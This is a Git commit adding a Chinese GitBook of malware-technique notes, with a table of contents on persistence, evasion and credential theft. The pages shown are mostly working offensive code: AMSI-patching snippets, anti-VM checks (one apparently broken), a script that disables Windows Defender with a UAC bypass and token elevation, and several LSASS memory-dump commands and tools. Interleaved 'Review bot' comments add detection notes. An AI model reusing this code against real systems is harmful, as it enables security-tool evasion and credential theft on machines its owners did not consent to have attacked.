GitBook: [main] 92 pages modified

This commit is contained in:
287182701 2021-05-16 17:08:17 +00:00 committed by gitbook-bot
parent 0c70b8fedf
commit 2143326028
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
92 changed files with 3957 additions and 0 deletions


@ -0,0 +1,11 @@
# 恶意软件学习笔记
2021年给自己挖一个新坑。
在这里整理自己学习恶意软件分析以来学到的东西,同时存放一些从各个地方看到的技巧。
希望在新的一年里,能够多多进步。
备注:
所有示例中均使用“qwqdanchun”作为可以随意起名的部分各负载地址均为”C:\Temp\qwqdanchun.\*”。
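Review bot: the naming-convention sentence at the end of the README has mismatched quotation marks (the second path opens with a closing quote, ”C:\Temp\qwqdanchun.\*”) and runs two statements together without punctuation; since every later page relies on this convention, make it one clear statement: `qwqdanchun` stands for any freely chosen name, and every payload path in the examples is `C:\Temp\qwqdanchun.*`.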

SUMMARY.md Normal file

@ -0,0 +1,136 @@
# Table of contents
* [恶意软件学习笔记](README.md)
## 权限维持 <a id="persistence"></a>
* [服务](persistence/service/README.md)
* [新建服务](persistence/service/new-service.md)
* [修改服务](persistence/service/edit-service.md)
* [隐藏服务](persistence/service/hide-service.md)
* [劫持服务](persistence/service/hijack-service.md)
* [启动项](persistence/startup/README.md)
* [注册表](persistence/startup/registry.md)
* [文件夹](persistence/startup/folder.md)
* [用户账户](persistence/user/README.md)
* [新建用户](persistence/user/add-user.md)
* [隐藏用户](persistence/user/hide-user.md)
* [DLL劫持](persistence/dll-hijack/README.md)
* [劫持自启动程序](persistence/dll-hijack/hijack-autorun-programs.md)
* [劫持.NET程序](persistence/dll-hijack/hijack-.net-program.md)
* [COM劫持](persistence/com-hijack/README.md)
* [COM劫持](persistence/com-hijack/com-hijack.md)
* [映像劫持](persistence/image-file-execution-options/README.md)
* [映像劫持](persistence/image-file-execution-options/image-file-execution-options.md)
* [计划任务](persistence/schtasks/README.md)
* [新建任务](persistence/schtasks/add-schtasks.md)
* [WMI](persistence/wmi/README.md)
* [WMI事件](persistence/wmi/wmi-event.md)
* [Office](persistence/office/README.md)
* [VSTO](persistence/office/vsto.md)
* [WLL/XLL](persistence/office/wll-xll.md)
* [模板文件](persistence/office/macro-enabled-add-in-file.md)
* [COM劫持](persistence/office/com-hijack.md)
* [BITS Jobs](persistence/bits-jobs/README.md)
* [BITS](persistence/bits-jobs/bits.md)
* [Rootkit](persistence/rootkit/README.md)
* [Rootkit](persistence/rootkit/rootkit.md)
* [未分类](persistence/uncatelogued/README.md)
* [Windows Telemetry](persistence/uncatelogued/windows-telemetry.md)
* [替换文件](persistence/uncatelogued/replace-file.md)
* [AppInit\_DLLs注入](persistence/uncatelogued/appinit-dlls-inject.md)
* [粘滞键](persistence/uncatelogued/sethc.exe.md)
* [cmd启动劫持](persistence/uncatelogued/command-processor.md)
* [屏幕保护](persistence/uncatelogued/screen-save.md)
* [注册SSP DLL](persistence/uncatelogued/ssp-dll.md)
* [AddMonitor](persistence/uncatelogued/addmonitor.md)
* [滥用POWERSHELL配置文件](persistence/uncatelogued/powershell-profile.md)
* [W32Time](persistence/uncatelogued/w32time.md)
* [UWP](persistence/uncatelogued/uwp.md)
* [Waitfor](persistence/uncatelogued/waitfor.md)
* [Bios](persistence/uncatelogued/bios.md)
* [劫持更新程序](persistence/uncatelogued/hijack-update-program.md)
* [利用LAPS](persistence/uncatelogued/laps.md)
* [SDB文件](persistence/uncatelogued/sdb.md)
## 提权 <a id="privilege-escalation"></a>
* [UAC Bypass](privilege-escalation/untitled-4.md)
* [漏洞](privilege-escalation/bug.md)
* [错误配置](privilege-escalation/wrong-config.md)
## 横向移动 <a id="lateral-movement"></a>
* [WMI](lateral-movement/wmi.md)
* [RPC](lateral-movement/rpc.md)
* [DCOM](lateral-movement/dcom.md)
* [HASH](lateral-movement/hash.md)
* [Kerberos tickets](lateral-movement/kerberos-tickets.md)
## 文件结构 <a id="file"></a>
* [Office](file/office.md)
* [LNK](file/lnk/README.md)
* [钓鱼lnk](file/lnk/phishing-lnk.md)
* [PE](file/pe.md)
* [CHM](file/chm/README.md)
* [钓鱼chm](file/chm/phishing-chm.md)
## 注入 <a id="inject"></a>
* [注入](inject/inject.md)
## 反分析 <a id="anti-analysis"></a>
* [反虚拟机/沙盒](anti-analysis/anti-vm-sandbox.md)
## 获取用户密码或hash <a id="get-password"></a>
* [SMB](get-password/smb.md)
* [注入mstsc.exe](get-password/inject-mstsc.exe.md)
* [Mimikatz](get-password/mimikatz.md)
* [NPLogonNotify](get-password/nplogonnotify.md)
* [Tickets](get-password/tickets.md)
## 进程链 <a id="process"></a>
* [启动进程](process/creat-new-process.md)
## 关闭杀软 <a id="disable-av"></a>
* [关闭WD](disable-av/disable-wd.md)
## AMSI
* [绕过AMSI](amsi/bypass-amsi.md)
## Dump内存 <a id="dump"></a>
* [MiniDumpWriteDump](dump/untitled.md)
* [Shellcode](dump/shellcode.md)
* [SilentProcessExit](dump/silentprocessexit.md)
* [procdump](dump/procdump.md)
* [Task Manager/Process Explorer](dump/task-manager-process-explorer.md)
* [Sqldumper](dump/sqldumper.md)
* [comsvcs.dll](dump/comsvcs.dll.md)
* [WinPmem](dump/winpmem.md)
* [ProcessDump.exe](dump/processdump.exe.md)
* [Dumpert](dump/dumpert.md)
* [BSOD](dump/bsod.md)
* [PPLdump](dump/ppldump.md)
* [Hibernation](dump/hibernation.md)
## 木马分析 <a id="rats"></a>
* [Stealer](rats/stealer/README.md)
* [输入法](rats/stealer/shu-ru-fa.md)
* [Hidden Remote](rats/hidden-remote.md)
## 常用工具 <a id="tools"></a>
* [Untitled](tools/untitled.md)
## 鬼知道有什么用的小知识 <a id="tips"></a>
* [鬼知道有什么用的小知识](tips/some-tips.md)
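Review bot: several SUMMARY entries point at placeholder file names that will be painful to rename once GitBook links depend on them: `privilege-escalation/untitled-4.md` for UAC Bypass, `dump/untitled.md` for MiniDumpWriteDump and `tools/untitled.md` for the tools section; the `persistence/uncatelogued/` directory is also misspelled (`uncategorized`). Give these files names matching their titles now, while the tree is new.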

amsi/bypass-amsi.md Normal file

@ -0,0 +1,85 @@
# 绕过AMSI
Powershell:
```text
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
```
c\#:
```csharp
public class Amsi
{
public static void Bypass()
{
string x64 = "uFcA";
x64 = x64 + "B4DD";
string x86 = "uFcAB4";
x86 = x86 + "DCGAA=";
if (is64Bit())
PatchA(Convert.FromBase64String(x64));
else
PatchA(Convert.FromBase64String(x86));
}
private static void PatchA(byte[] patch)
{
try
{
string liba = Encoding.Default.GetString(Convert.FromBase64String("YW1zaS5kbGw="));
var lib = Win32.LoadLibraryA(ref liba);//Amsi.dll
string addra = Encoding.Default.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI="));
var addr = Win32.GetProcAddress(lib, ref addra);//AmsiScanBuffer
uint oldProtect;
Win32.VirtualAllocEx(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);
Marshal.Copy(patch, 0, addr, patch.Length);
}
catch (Exception e)
{
Console.WriteLine(" [x] {0}", e.Message);
Console.WriteLine(" [x] {0}", e.InnerException);
}
}
private static bool is64Bit()
{
bool is64Bit = true;
if (IntPtr.Size == 4)
is64Bit = false;
return is64Bit;
}
}
class Win32
{
public static readonly DelegateVirtualProtect VirtualAllocEx = LoadApi<DelegateVirtualProtect>("kernel32", Encoding.Default.GetString(Convert.FromBase64String("VmlydHVhbFByb3RlY3Q=")));//VirtualProtect
public delegate int DelegateVirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
#region CreateAPI
[DllImport("kernel32", SetLastError = true)]
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
public static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
public static CreateApi LoadApi<CreateApi>(string name, string method)
{
return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi));
}
#endregion
}
```
js:
```javascript
var sh=new ActiveXObject('WScript.Shell');
var key="HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable"
try{
var AmsiEnable=sh.RegRead(key);
if(AmsiEnable!=0) {
throw new Error(1'');
}
} catch(e) {
sh.RegWrite(key,0,"REG_DWORD");
sh.Run("cscript -e{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}"+WScript.ScriptFullName,0,1);
sh.RegWrite(key,1,"REG_DWORD");
WScript.Quit(1);
}
```
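Review bot: none of the three snippets says what it touches, which is what analysis notes need most. Add a sentence per block naming the observable: the PowerShell one finds a non-public static `*Context` field of the `*iUtils` type by reflection and overwrites it with `Marshal.Copy`; the C# one resolves `AmsiScanBuffer` in `amsi.dll`, changes the page protection and copies a byte patch over the function (the delegate is named `VirtualAllocEx` although the base64 string and the comment show it is `VirtualProtect`, and its return value is never checked); the JS one sets `HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable` to 0, re-runs itself through `cscript` with an explicit engine CLSID, then sets the value back to 1. From a detection standpoint the transient `AmsiEnable` write and a writable page inside `amsi.dll` are the artifacts, so record them next to the code rather than leaving the snippets bare.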


@ -0,0 +1,79 @@
# 反虚拟机/沙盒
c\#\(WMI检测内存\):
```csharp
using System;
using System.Management;
using System.Threading;
namespace Program
{
class Anti_Analysis
{
public static void RunAntiAnalysis()
{
if (isVM())
{
Environment.FailFast(null);
}
Thread.Sleep(1000);
}
public static bool isVM()
{
SelectQuery selectQuery = new SelectQuery("Select * from Win32_CacheMemory");
//SelectQuery selectQuery = new SelectQuery("Select * from CIM_Memory");
ManagementObjectSearcher searcher = new ManagementObjectSearcher(selectQuery);
int i = 0;
foreach (ManagementObject DeviceID in searcher.Get())
i++;
return (i == 0);
}
}
}
```
c++\(即插即用设备\)
{% embed url="https://github.com/LordNoteworthy/al-khaser" caption="" %}
```cpp
#include <Windows.h>
#include <iostream>
#include <string>
int main()
{
DISPLAY_DEVICE dd;
dd.cb = sizeof(dd);
int deviceIndex = 0;
while (EnumDisplayDevices(0, deviceIndex, &dd, 0))
{
std::wstring deviceName = dd.DeviceName;
int monitorIndex = 0;
while (EnumDisplayDevices(deviceName.c_str(), monitorIndex, &dd, 0))
{
int flag = strlen((const char*)dd.DeviceString);
if (flag > 2) {
std::wcout << "this is vm";
}
else
{
std::wcout << "this is not vm";
}
++monitorIndex;
}
++deviceIndex;
}
return 0;
}
```
{% embed url="https://github.com/a0rtega/pafish" caption="" %}
测试工具:
{% embed url="https://github.com/LordNoteworthy/al-khaser" caption="" %}
{% embed url="https://github.com/a0rtega/pafish" caption="" %}
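Review bot: the C++ block does not test what its heading (即插即用设备, plug-and-play devices) claims: it enumerates display adapters and monitors, and `strlen((const char*)dd.DeviceString)` is applied to a `WCHAR` buffer (the code only builds with UNICODE, since `dd.DeviceName` is assigned to a `std::wstring`), so it returns 1 for any ASCII name and `flag > 2` never holds; the inner loop also reuses `dd`, overwriting the adapter entry. Either cite the specific al-khaser check it was adapted from or describe in prose which property is meant to be compared. The C# `Win32_CacheMemory` count is likewise a heuristic that depends on the firmware populating SMBIOS cache entries, so label it as such rather than pairing it with `Environment.FailFast`. The al-khaser and pafish embeds are also repeated twice on the page.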

disable-av/disable-wd.md Normal file

@ -0,0 +1,129 @@
# 关闭WD
```text
@(echo off% <#%) &title Toggle Defender, AveYo 2020-11-16 || configure just auto-actions OFF; toggle icon on ltsb
set "0=%~f0"&set 1=%*&powershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0)) &exit/b ||#>)[1]
sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'
if ($(sc.exe qc windefend) -like '*TOGGLE*') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}
## Comment to hide dialog prompt with Yes, No, Cancel (6,7,2)
if ($env:1 -ne 6 -and $env:1 -ne 7) {
$choice=(new-object -ComObject Wscript.Shell).Popup($A + ' Windows Defender?', 0, 'Defender is: ' + $S, 51)
if ($choice -eq 2) {break} elseif ($choice -eq 6) {$env:1=$TOGGLE} else {$env:1=$KEEP}
}
## Without the dialog prompt above will toggle automatically
if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }
## Comment to not relaunch systray icon
start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1
## Comment to not hide per-user toggle notifications
$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'
ni $notif -ea 0|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0
sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}
## 'UAC is not a security boundary' - OK, Microsoft. But why do you refuse to adress the lamest AlwaysNotify-compatible bpass?
$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')
$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition
## Cascade elevation
$u=0;$w=whoami /groups;if($w-like'*1-5-32-544*'){$u=1};if($w-like'*1-16-12288*'){$u=2};if($w-like'*1-16-16384*'){$u=3}
## Reload from volatile registry as needed
$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39
$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'
$script+=';iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$script
## 0: limited-user: must runas
if ($u -eq 0) {
start powershell -args $script -verb runas -win 1; break
}
## 1: admin-user non-elevated: try windows built-in lame uac bpass before runas
if ($u -eq 1) {
if ($flaw.Actions.Item(1).Path -inotlike '*windir*'){start powershell -args $script -verb runas -win 1; break}
sp hkcu:\environment windir $('powershell '+$script+' #')
$z=$bpass.RunEx($null,2,0,$null); $wait=0; while($bpass.State -gt 3 -and $wait -lt 17){sleep -m 100; $wait+=0.1}
if(gp hkcu:\environment windir -ea 0){rp hkcu:\environment windir -ea 0;start powershell -args $script -verb runas -win 1};break
}
## 2: admin-user elevated: get ti/system via runasti lean and mean snippet [$window hide:0x0E080600 show:0x0E080610]
if ($u -eq 2) {
$A=[AppDomain]::CurrentDomain."Def`ineDynamicAssembly"(1,1)."Def`ineDynamicModule"(1);$D=@();0..5|%{$D+=$A."Def`ineType"('A'+$_,
1179913,[ValueType])} ;4,5|%{$D+=$D[$_]."Mak`eByRefType"()} ;$I=[Int32];$J="Int`Ptr";$P=$I.module.GetType("System.$J"); $F=@(0)
$F+=($P,$I,$P),($I,$I,$I,$I,$P,$D[1]),($I,$P,$P,$P,$I,$I,$I,$I,$I,$I,$I,$I,[Int16],[Int16],$P,$P,$P,$P),($D[3],$P),($P,$P,$I,$I)
$S=[String]; $9=$D[0]."Def`inePInvokeMethod"('CreateProcess',"kernel`32",8214,1,$I,@($S,$S,$I,$I,$I,$I,$I,$S,$D[6],$D[7]),1,4)
1..5|%{$k=$_;$n=1;$F[$_]|%{$9=$D[$k]."Def`ineField"('f'+$n++,$_,6)}};$T=@();0..5|%{$T+=$D[$_]."Cr`eateType"();$Z=[uintptr]::size
nv ('T'+$_)([Activator]::CreateInstance($T[$_]))}; $H=$I.module.GetType("System.Runtime.Interop`Services.Mar`shal");
$WP=$H."Get`Method"("Write$J",[type[]]($J,$J)); $HG=$H."Get`Method"("AllocH`Global",[type[]]'int32'); $v=$HG.invoke($null,$Z)
'TrustedInstaller','lsass'|%{if(!$pn){net1 start $_ 2>&1 >$null;$pn=[Diagnostics.Process]::GetProcessesByName($_)[0];}}
$WP.invoke($null,@($v,$pn.Handle)); $SZ=$H."Get`Method"("SizeOf",[type[]]'type'); $T1.f1=131072; $T1.f2=$Z; $T1.f3=$v; $T2.f1=1
$T2.f2=1;$T2.f3=1;$T2.f4=1;$T2.f6=$T1;$T3.f1=$SZ.invoke($null,$T[4]);$T4.f1=$T3;$T4.f2=$HG.invoke($null,$SZ.invoke($null,$T[2]))
$H."Get`Method"("StructureTo`Ptr",[type[]]($D[2],$J,'boolean')).invoke($null,@(($T2-as $D[2]),$T4.f2,$false));$window=0x0E080600
$9=$T[0]."Get`Method"('CreateProcess').Invoke($null,@($null,$cmd,0,0,0,$window,0,$null,($T4-as $D[4]),($T5-as $D[5]))); break
}
## Create registry paths
$wdp='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
' Security Center\Notifications','\UX Configuration','\MpEngine','\Spynet','\Real-Time Protection' |% {ni ($wdp+$_)-ea 0|out-null}
## Toggle Defender
if ($env:1 -eq 7) {
rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0
rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0
rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0
rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0
rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen -Force -ea 0
rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
sc.exe config windefend depend= RpcSs
net1 start windefend
kill -Force -Name MpCmdRun -ea 0
start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-EnableService' -win 1
} else {
sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen 0 -Type Dword -Force -ea 0
sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
net1 stop windefend
sc.exe config windefend depend= RpcSs-TOGGLE
kill -Name MpCmdRun -Force -ea 0
start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-DisableService' -win 1
del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\mpenginedb.db') -Force -ea 0 ## Commented = keep scan history
del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\History\Service') -Recurse -Force -ea 0
}
## PERSONAL CONFIGURATION TWEAK - COMMENT OR UNCOMMENT #rp ENTRIES TO TWEAK OR REVERT
sp $wdp DisableRoutinelyTakingAction 1 -Type Dword -Force -ea 0 ## Auto Actions OFF
# rp $wdp DisableRoutinelyTakingAction -Force -ea 0 ## Auto Actions ON [default]
sp $wdp PUAProtection 1 -Type Dword -Force -ea 0 ## Potential Unwanted Apps ON
rp $wdp PUAProtection -Force -ea 0 ## Potential Unwanted Apps OFF [default]
sp ($wdp+'\MpEngine') MpCloudBlockLevel 2 -Type Dword -Force -ea 0 ## Cloud blocking level HIGH
rp ($wdp+'\MpEngine') MpCloudBlockLevel -Force -ea 0 ## Cloud blocking level LOW [default]
sp ($wdp+'\Spynet') SpyNetReporting 2 -Type Dword -Force -ea 0 ## Cloud protection ADVANCED
rp ($wdp+'\Spynet') SpyNetReporting -Force -ea 0 ## Cloud protection BASIC [default]
sp ($wdp+'\Spynet') SubmitSamplesConsent 0 -Type Dword -Force -ea 0 ## Sample Submission ALWAYS-PROMPT
rp ($wdp+'\Spynet') SubmitSamplesConsent -Force -ea 0 ## Sample Submission AUTOMATIC [default]
sp ($wdp+'\Real-Time Protection') RealtimeScanDirection 1 -Type Dword -Force -ea 0 ## Scan incoming file only
rp ($wdp+'\Real-Time Protection') RealtimeScanDirection -Force -ea 0 ## Scan incoming and outgoing file [default]
## Uncomment to close windows built-in lame uac bpass and/or reset uac
# if ($flaw.Actions.Item(1).Path -ilike '*windir*') {
# $flaw.Actions.Item(1).Path=$env:systemroot+'\system32\cleanmgr.exe' ## %windir%\system32\cleanmgr.exe [default]
# $baffling.RegisterTaskDefinition($bpass.Name,$flaw,20,$null,$null,$null) ## UAC silent bpass mitigation
# $uac='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
# sp $uac EnableLUA 1 -Type Dword -Force -ea 0 ## UAC enable
# sp $uac ConsentPromptBehaviorAdmin 2 -Type Dword -Force -ea 0 ## UAC always notify - bpassable otherwise
# sp $uac PromptOnSecureDesktop 1 -Type Dword -Force -ea 0 ## UAC secure - prevent automation
# }
'@ -Force -ea 0; iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)
#-_-# hybrid script, can be pasted directly into powershell console
```
来源:[https://pastebin.com/raw/hLsCCZQY](https://pastebin.com/raw/hLsCCZQY)
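Review bot: the page drops AveYo's script under a two-character heading with no description of what it changes. Before the block, list the artifacts: it writes `DisableAntiSpyware` under both `HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender` and `HKLM:\SOFTWARE\Microsoft\Windows Defender`, stops `windefend` and rewrites its dependency to `RpcSs-TOGGLE` as a state marker (that string in `sc qc windefend` output is a direct tamper indicator), suppresses Security Center notifications, deletes the scan history under `ProgramData\Microsoft\Windows Defender\Scans`, and when run as a non-elevated admin uses the `SilentCleanup` scheduled task's `%windir%` expansion to elevate. Two caveats belong in the text: Microsoft deprecated `DisableAntiSpyware` on Windows 10 client in 2020 and Tamper Protection stops these policy writes from taking effect, so the toggle is version-dependent; and the script's own commented block at the end (resetting the `cleanmgr.exe` path and `ConsentPromptBehaviorAdmin 2`) is the mitigation for the elevation path and deserves to be called out as such.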

dump/bsod.md Normal file

@ -0,0 +1,6 @@
# BSOD
参考链接:
{% embed url="https://www.mrwu.red/web/2000.html" caption="" %}

dump/comsvcs.dll.md Normal file

@ -0,0 +1,8 @@
# comsvcs.dll
powershell:
```text
.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <pid> C:\temp\lsass.dmp full
```
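Review bot: the label says powershell but the line is a plain `rundll32.exe` call; state which shell it is typed into and what it requires (it fails without SeDebugPrivilege in an elevated token). The output path `C:\temp\lsass.dmp` also departs from the README's `C:\Temp\qwqdanchun.*` convention. Worth adding for the analysis side: `rundll32.exe` loading `comsvcs.dll` with `MiniDump` on the command line is one of the most widely signatured LSASS-access patterns.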

dump/dumpert.md Normal file

@ -0,0 +1,6 @@
# Dumpert
参考链接:
{% embed url="https://github.com/outflanknl/Dumpert" caption="" %}

dump/hibernation.md Normal file

@ -0,0 +1,6 @@
# Hibernation
参考链接:
{% embed url="https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps" caption="" %}

dump/ppldump.md Normal file

@ -0,0 +1,6 @@
# PPLdump
参考链接:
{% embed url="https://github.com/itm4n/PPLdump" caption="" %}

dump/procdump.md Normal file

@ -0,0 +1,10 @@
# procdump
```text
procdump -ma lsass.exe lsass.dmp
```
[http://live.sysinternals.com/procdump.exe](http://live.sysinternals.com/procdump.exe)
[http://live.sysinternals.com/procdump64.exe](http://live.sysinternals.com/procdump64.exe)
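Review bot: both download links use `http://`; `live.sysinternals.com` is also served over HTTPS, and the page should not point readers at binaries fetched over plain HTTP. As with the other dump pages, one sentence of context is missing: `procdump -ma` is a Microsoft-signed tool, but the handle it opens on `lsass.exe` is exactly what EDR credential-theft rules key on, and `lsass.dmp` breaks the `qwqdanchun` naming convention.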

dump/processdump.exe.md Normal file

@ -0,0 +1,13 @@
# ProcessDump.exe
## 来自Cisco Jabber
位于`c:\program files (x86)\cisco systems\cisco jabber\x64\`
powershell:
```text
cd c:\program files (x86)\cisco systems\cisco jabber\x64\
processdump.exe (ps lsass).id c:\temp\lsass.dmp
```
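Review bot: unlike the other dump pages this one cites no source; add a reference for where the technique was reported and state what the binary is (a debugging helper shipped with Cisco Jabber). The relevant analysis point is that it is a legitimate vendor binary, so allowlisting by path or publisher alone does not help and detection has to rest on the LSASS handle access itself.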

dump/shellcode.md Normal file

@ -0,0 +1,6 @@
# Shellcode
参考链接:
{% embed url="https://osandamalith.com/2019/05/11/shellcode-to-dump-the-lsass-process/" caption="" %}


@ -0,0 +1,6 @@
# SilentProcessExit
参考链接:
{% embed url="https://github.com/deepinstinct/LsassSilentProcessExit" caption="" %}

dump/sqldumper.md Normal file

@ -0,0 +1,17 @@
# Sqldumper
Microsoft SQL附带的调试实用程序。
位置:
* C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
* C:\Program Files \(x86\)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
参考链接:
{% embed url="https://docs.microsoft.com/en-US/troubleshoot/sql/tools/use-sqldumper-generate-dump-file" caption="" %}
{% embed url="https://twitter.com/countuponsec/status/910969424215232518" caption="" %}
{% embed url="https://twitter.com/countuponsec/status/910977826853068800" caption="" %}
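Review bot: the second path is malformed as written: there is a stray space before `\(x86\)` and `Microsoft Analysis\AS OLEDB\140` looks truncated, so verify it against the linked Microsoft article before anyone copies it. Also worth one sentence: SQLDumper.exe is a Microsoft-signed debugging utility, so its presence is not suspicious by itself; the indicator is the process it is pointed at.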


@ -0,0 +1,6 @@
# Task Manager/Process Explorer
任务管理器中
右键-创建转储文件

dump/untitled.md Normal file

@ -0,0 +1,180 @@
# MiniDumpWriteDump
c\#:
```csharp
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
namespace MiniDumpWriteDump
{
class Program
{
[DllImport("dbghelp.dll", EntryPoint = "MiniDumpWriteDump", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, ExactSpelling = true, SetLastError = true)]
static extern bool MiniDumpWriteDump(IntPtr hProcess, uint processId, SafeHandle OutFile, uint dumpType, IntPtr expParam, IntPtr userStreamParam, IntPtr callbackParam);
static void Main(string[] args)
{
try
{
Process[] process = Process.GetProcessesByName(args[0]);
Console.WriteLine("Get Processes Handle is " + process[0].Handle);
Console.WriteLine("Get Processes Id is " + process[0].Id);
using (FileStream fs = new FileStream("7kb.tmp", FileMode.Create, FileAccess.ReadWrite, FileShare.Write))
{
Console.WriteLine("Dump Status:" + MiniDumpWriteDump(process[0].Handle, (uint)process[0].Id, fs.SafeFileHandle, (uint)2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero));
}
}
catch (Exception)
{
Console.WriteLine("MiniDumpWriteDump.exe lsass");
}
}
}
}
```
ps1
```text
function Out-Minidump
{
<#
.SYNOPSIS
Generates a full-memory minidump of a process.
PowerSploit Function: Out-Minidump
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Out-Minidump writes a process dump file with all process memory to disk.
This is similar to running procdump.exe with the '-ma' switch.
.PARAMETER Process
Specifies the process for which a dump will be generated. The process object
is obtained with Get-Process.
.PARAMETER DumpFilePath
Specifies the path where dump files will be written. By default, dump files
are written to the current working directory. Dump file names take following
form: processname_id.dmp
.EXAMPLE
Out-Minidump -Process (Get-Process -Id 4293)
Description
-----------
Generate a minidump for process ID 4293.
.EXAMPLE
Get-Process lsass | Out-Minidump
Description
-----------
Generate a minidump for the lsass process. Note: To dump lsass, you must be
running from an elevated prompt.
.EXAMPLE
Get-Process | Out-Minidump -DumpFilePath C:\temp
Description
-----------
Generate a minidump of all running processes and save them to C:\temp.
.INPUTS
System.Diagnostics.Process
You can pipe a process object to Out-Minidump.
.OUTPUTS
System.IO.FileInfo
.LINK
http://www.exploit-monday.com/
#>
[CmdletBinding()]
Param (
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
[System.Diagnostics.Process]
$Process,
[Parameter(Position = 1)]
[ValidateScript({ Test-Path $_ })]
[String]
$DumpFilePath = $PWD
)
BEGIN
{
$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
$Flags = [Reflection.BindingFlags] 'NonPublic, Static'
$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
$MiniDumpWithFullMemory = [UInt32] 2
}
PROCESS
{
$ProcessId = $Process.Id
$ProcessName = $Process.Name
$ProcessHandle = $Process.Handle
$ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
